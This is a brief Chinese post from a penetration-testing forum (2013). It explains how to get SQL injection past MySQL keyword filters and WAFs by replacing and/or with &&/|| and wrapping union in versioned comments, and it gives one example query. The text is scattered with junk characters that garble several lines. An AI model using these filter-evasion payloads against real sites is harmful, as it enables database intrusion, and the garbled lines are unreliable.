中国网络渗透测试联盟

标题: mysql注入对and or的过滤及uinon select等过滤的一个方法突破 [打印本页]
作者: admin    时间: 2013-2-23 12:41
标题: mysql注入对and or的过滤及uinon select等过滤的一个方法突破
1.and 用&& 代替
1 @0 L9 b* b5 ~$ x# `7 c; n1 b9 r" `) S4 W, d1 g
2. or 用||代替2 |; [& c2 B4 |9 y4 l. Z

  U  i2 i! w' [, v# |3.union select from 变成 /*!union*/这种。
+ B: ^7 f4 y, N8 p& w
, G8 d: o- L6 V- d一个例子:
$ g. \! x: ^" w: d% s) t/ d6 H/ M$ t( W( d+ z0 w$ {
/ select 1 /*!union*/ select 2 from adad where 1&&11 {# m3 g6 ^/ Y! `$ A: @
" @( j, B5 ^8 r/ o1 ^+ Z
摘自 it_security
3 C3 M* L; v& R$ i! C
6 z' {* h: [" S4 P# @绕过waf的一个思路
8 P4 ?: \* u* ?5 X3 C4 ~+ \: h5 y, j; h- I




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2